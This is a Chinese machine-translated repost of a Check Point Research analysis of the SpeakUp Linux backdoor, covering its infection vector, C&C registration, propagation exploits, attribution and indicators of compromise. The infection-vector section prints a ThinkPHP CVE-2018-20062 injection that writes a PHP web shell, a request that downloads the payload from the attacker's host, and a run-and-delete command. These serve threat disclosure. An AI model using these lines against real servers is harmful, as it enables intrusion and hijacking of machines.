SpeakUp:一种新的未检测到的后门Linux木马

Mr.Bai 1,115 浏览 0

SpeakUp:一种新的未检测到的后门Linux木马

  • Check Point Research发现了一项利用Linux服务器植入新Backdoor木马的新活动。
  • 被称为“SpeakUp”的新木马利用了六种不同Linux发行版中已知的漏洞。
  • 该攻击针对全球服务器,包括AWS托管机器。

Check Point的研究人员发现了一项利用Linux服务器植入新Backdoor的新活动,该活动躲避了所有安全厂商。名为“SpeakUp”的新特洛伊木马程序在其命令和控制名称之一后,利用了六种不同Linux发行版中的已知漏洞。这一攻击正在获得动力,目标是东亚和拉丁美洲的服务器,包括AWS托管机器。

SpeakUp的作用是在受感染的子网内部传播,并超越新的IP范围,利用远程代码执行漏洞。此外,SpeakUp还提供了使用未检测到的后门感染Mac设备的能力。

虽然这次新攻击背后的威胁行为者的确切身份仍然未经证实,但Check Point研究人员能够将SpeakUp的作者与Zettabit名下的恶意软件开发者联系起来虽然SpeakUp的实现方式不同,但它与Zettabit的工艺有很多共同之处

SpeakUp:一种新的未检测到的后门Linux木马图1: SpeakUp的受害者分布

SpeakUp:一种新的未检测到的后门Linux木马

图2: SpeakUp每天的传播速率

 

感染矢量

最初的感染向量针对ThinkPHP中最近报告的漏洞,并使用命令注入技术上传服务并执行Perl后门的PHP shell。

剥削分三个步骤:

  1. 利用CVE-2018-20062上传PHP shell

使用GET请求,ThinkPHP(CVE-2018-20062)中的远程命令执行漏洞将发送到目标服务器,如下所示:

s = / index / \ think \ app / invokefunction&function = call_user_func_array&vars [0] = system&vars [1] [] = echo ^ <?php $ action = $ _GET ['module']; system($ action);? ^ >>的index.php

 

此shell执行通过查询中的“module”参数发送的命令。

  1. 服务后门

使用以下资源将另一个HTTP请求发送到目标服务器:

/?module = wget hxxp:// 67 [。] 209.177.163 / ibus -O / tmp / e3ac24a0bcddfacd010a6c10f4a814bc

上述标准注入拉出ibus有效负载并将其存储在/ tmp / e3ac24a0bcddfacd010a6c10f4a814bc

  1. 启动后门

使用额外的HTTP请求发出执行:

/?module = perl / tmp / e3ac24a0bcddfacd010a6c10f4a814bc ; sleep 2; rm -rf / tmp / e3ac24a0bcddfacd010a6c10f4a814bc

执行perl脚本,使其休眠两秒钟并删除文件以删除任何证据。

 

后门

我们分析的样本是在2019年1月14日在中国的一台机器上进行的,并于2019年1月9日首次提交给VirusTotal。在撰写本文时,它没有检测到VT。

SpeakUp:一种新的未检测到的后门Linux木马

图3:没有检测到Virus Total中的SpeakUp

 

为了使安全研究人员能够忍受调查过程,第二阶段的有效载荷采用盐渍基地进行编码64。令我们沮丧的是,C&C通信也使用相同的组合进行编码。

显示的数据包含多个C&C域,IP地址和其他独特参数,以及第二阶段有效负载和附加模块。

在下面的分析中,我们将通过恶意代码,揭示特洛伊木马在受害者机器上运行的不同功能和模块。

 

受害者登记

SpeakUp使用HTTP上的POSTGET请求与其主要C&C进行通信,后者是speakupomaha [。] com的受感染网站。

第一个POST数据包发送受害者ID和更多介绍性信息,例如已安装脚本的当前版本。(目前为1.0.4)

第一个C&C响应是“needrgr”,这意味着受感染的受害者是服务器新手,需要注册。

之后,特洛伊木马通过执行以下LINUX命令发布有关机器的“完整信息”:

  • Uname(-r,-v,-m,-n,-a,-s)
  • 我是谁
  • Ifconfig -a
  • Arp -a
  • cat / proc / cpuinfo | grep -c“cpu family”2>&1
  • 谁-b

SpeakUp:一种新的未检测到的后门Linux木马

图4:注册过程和介绍性命令

 

SpeakUp的主要功能

注册过程完成后,SpeakUp会在固定的“爆震”间隔内不断与C&C进行新任务通信。

C&C提供以下命令类型:

“newtask” - 在本地计算机上执行任意代码,从任何远程服务器下载并执行文件,终止或卸载程序并发送更新的指纹数据。

“notask” - 睡3秒钟并要求额外的命令。

newerconfig“ - 更新下载的miner配置文件。

通过使用cron和内部互斥锁来确保SpeakUp的持久性,以确保始终只有一个实例保持活动状态。

 

感染后交通

一旦受害者成功注册,C&C就开始发送新任务。他们中的大多数操纵机器下载并执行不同的文件。

值得一提的是使用中的User-Agents。SpeakUp定义了受感染机器在与C&C的每次通信中必须使用的三个用户代理。其中两个是MacOS X User-Agents,第三个是散列字符串:

  • Mozilla / 5.0(iPad; U; CPU OS 3_2_1,如Mac OS X; en-us)AppleWebKit / 531.21.10(KHTML,与Gecko一样)Mobile / BADDAD
  • Mozilla / 5.0(iPad; U; CPU OS 3_2_1,如Mac OS X; en-us)AppleWebKit / 531.21.10(KHTML,如Gecko)Mobile / 7B405
  • E9BC3BD76216AFA560BFB5ACAF5731A3

SpeakUp:一种新的未检测到的后门Linux木马

图5: SpeakUp的请求使用salted base64加密,并包含唯一的User-Agent

 

目前,SpeakUp为XMRig矿工服务于其受监控的受感染服务器。XMRHunter称,钱包总共拥有约107枚Monero硬币。

SpeakUp:一种新的未检测到的后门Linux木马

图6: SpeakUp接收要执行的其他命令,这次是纯文本。

 

传播

SpeakUp还为其后门配备了i (原文如此),这是一个python脚本,允许后门扫描并感染其内部和外部子网中的更多Linux服务器。其主要功能是:

  1. 强制使用预定义的用户名和密码列表尝试登录管理面板。
  2. 扫描受感染机器的网络环境; 检查共享相同内部和外部子网掩码的服务器上的特定端口的可用性(即255.255.0.0 \ 16)。
  3. 尝试利用目标服务器中的以下远程执行代码漏洞:

a)CVE-2012-0874:JBoss企业应用平台多个安全绕过漏洞

b)CVE-2010-1871:JBoss Seam Framework远程代码执行

c)JBoss AS 3/4/5/6:远程命令执行(漏洞利用

d) CVE-2017-10271:Oracle WebLogic wls-wsat组件反序列化RCE 

e)CVE-2018-2894:Oracle融合中间件的Oracle WebLogic Server组件中的漏洞。

f)Hadoop YARN ResourceManager - 命令执行(利用

g)CVE-2016-3088:Apache ActiveMQ文件服务器文件上载远程执行代码漏洞。

成功利用其中一个漏洞将导致在已利用的服务器上部署原始ibus脚本。

 

攻击者身份和潜在客户

适用于Unix OS的Ibus客户端

ibus脚本中,我们可以看到有关GNU Emacs的IBus客户端的简短描述。中IBus客户端是Linux和Unix操作系统的开放源码多种语言输入框架。虽然它支持所有不使用拉丁字母的语言,但似乎主要受众是亚洲用户。描述和文件名是将SpeakUp链接到Ibus框架的唯一元素; 内容没有任何相似之处。

这可能意味着SpeakUp与东亚之间存在联系。



独特的用户代理

SpeakUp与C&C之间的HTTP通信中使用的唯一用户代理是此活动背后威胁行为者身份的可能路径。

唯一字符串主要由“Mobile / BADDAD”,“Mobile / 7B405”和“ E9BC3BD76216AFA560BFB5ACAF5731A3 ”组成

有趣的是,字符串原来是liteHTTP这个词的md5哈希

谷歌搜索liteHTTP导致liteHTTP github 项目

虽然liteHTTP是一个面向Windows客户端的基于C#的bot,但它的模块有点类似于我们的SpeakUp木马。

  • 下载并执行
  • 启动(具有持久性)
  • 系统信息的收集(操作系统,版本,安装位置等)
  • 自我更新
  • 卸载

该项目由名为zettabithf的用户创建,该用户链接到Hack论坛中具有相同名称的用户

SpeakUp:一种新的未检测到的后门Linux木马

图7:Zettabit在Hack论坛上的用户描述

Hack论坛的个人资料可能意味着SpeakUp后门的作者是俄语,因为很多评论都是用这种语言写的。他似乎也是一名僵尸网络开发人员,提供建议并发布他的LiteHTTP机器人,它似乎有一个精心设计的GUI界面。

另一个有趣的事情是在他的帖子中多次使用首字母缩略词“Knock”。“Knock”也出现在SpeakUp代码中的几个字符串中。

SpeakUp:一种新的未检测到的后门Linux木马SpeakUp:一种新的未检测到的后门Linux木马

图8和9:从用户配置文件中获取的LiteHTTP屏幕截图,其中首字母缩写词“Knock”出现

 

结论

SpeakUp混淆的有效载荷和传播技术毫无疑问是制造中更大威胁的工作。很难想象有人会为了部署少数矿工而建造这样一个复杂的有效载荷阵列。此活动背后的威胁行为者可以在任何给定时间部署额外的有效载荷,可能更具侵入性和攻击性。它能够扫描受感染服务器的周围网络并分发恶意软件。这项活动虽然相对较新,但可能演变成更大,可能更有害的内容。

事实上,这场竞选背后的威胁演员,“Zettabithf”本人,在这方面提供了一些“智慧的话语”:

SpeakUp:一种新的未检测到的后门Linux木马

 

 

CloudGuard IaaS是一种先进的威胁防御技术,可以防御您的云基础架构,包括像“SpeakUp”这样的新特洛伊木马。

Check Point IPS刀片提供针对这些威胁的保护:

  • HTTP上的命令注入
  • NoneCMS ThinkPHP远程执行代码(CVE-2018-20062)
  • Oracle WebLogic WLS安全组件远程执行代码(CVE-2017-10271)
  • Oracle WebLogic WLS服务器组件任意文件上载(CVE-2018-2894)
  • Hadoop YARN ResourceManager远程命令执行
  • Apache ActiveMQ文件服务器多方法目录遍历(CVE-2016-3088)
  • JBoss Seam 2框架远程执行代码(CVE-2010-1871)
  • JBoss企业应用程序平台调用程序Servlet远程执行代码(CVE-2012-0874)
  • 红帽JBoss AS远程执行代码
  • 可疑的Linux Shell Downloader

Check Point Anti-Bot刀片提供针对此威胁的保护:

  • Linux.SpeakUp

 

国际石油公司

MD5:

SpeakUp脚本:

0a4e5831a2d3115acb3e989f0f660a6f
0b5e1eb67be7c3020610b321f68375c1
968d1906be7eb8321a3afac5fde77467
074d7a4417d55334952d264c0345d885
f357f32d7c2ddfef4b5850e7506c532b
b6311bffcea117dceac5ccac0a243ae5
2adf4e4512aaafab75e8411aa7121ffa
a73c7b777d31b0a8ef270809e2ed6510
114cda60d215e44baeef22b7db0c64d5
8f725fc5406ebf679c5c7ade3e8d5f70
4a80a075c7c6b5e738a7f4b60b7b101f
e18749e404baec2aa29f4af001164d1b
1a377b5d5d2162327f0706cc84427780
1da94e156609d7e880c413a124bad004
713260a53eff05ad44aad8d6899f1c6e
36cda3c77ba380d6388a01aafcbaa6c7
0f83482368343f5c811bac84a395d2c0
8dd6cb5f33d25512805c70bd3db5f433
e4ca1e857034cbe0428d431c15ec8608
36502273cee61825dc97d62a3dffe729
f16c5a6342ccc253b1de177d3fa310b1
08d7674532cc226931570e6a99d5ba30
279c4aa955085480f3ad0c19aa36a93b

 

XMRig矿工:

f79be3df4cbfe81028040796733ab07f 

a21a3d782d30b51515834a7bf68adc8e 

c572a10ca12f3bd9783c6d576aa080fb 

b60ec230644b740ca4dd6fd45059a4be 

5e6b6fcd7913ae4917b0cdb0f09bf539 

ae875c496535be196449547a15205883 

068d424a1db93ec0c1f90f5e501449a3 

996e0c8190880c8bf1b8ffb0826cf30f

 

C&CS:

67。] 209.177.163
173。] 82.104.196
5。] 196.70.86
120。] 79.247.183
5。] 2.73.127 / lnsqqFE2jK / pprtnp153WWW.php
Speakupomaha [。] COM /杂项/ UI /图像/ Indxe.php
Linuxservers [。] 000webhostapp [。] COM / hp.html
linuxsrv134 [。] XP3 [。] BIZ

 

Monero钱包:

47UW2Qv7AB4CsD8L5WWSvx58ztrzHhcMeYN7AJry9aMZhGDLXGwBHLv8LpaDUxpmdWfqbbfrqpdieQAeVSMCU1qY4BFABPY 

4Aa3TcU7ixMVcYwbsw8ENVbFwt4ZuqrNBVij5TRvPCTpGRK5BKBHQPu7ahT7z2A6547a5Lcn7yPZV1xU22ZbviqxUX7JVuP 

4An3Radh69LgcTHJf1U3awa9ffej4b6DcUmEv8wirsDm8zRMSjifrwybH2AzHdEsW8eew3rFtk4QbGJMxqitfxmZJhABxpT

发表评论 取消回复
表情 图片 链接 代码

分享
请选择语言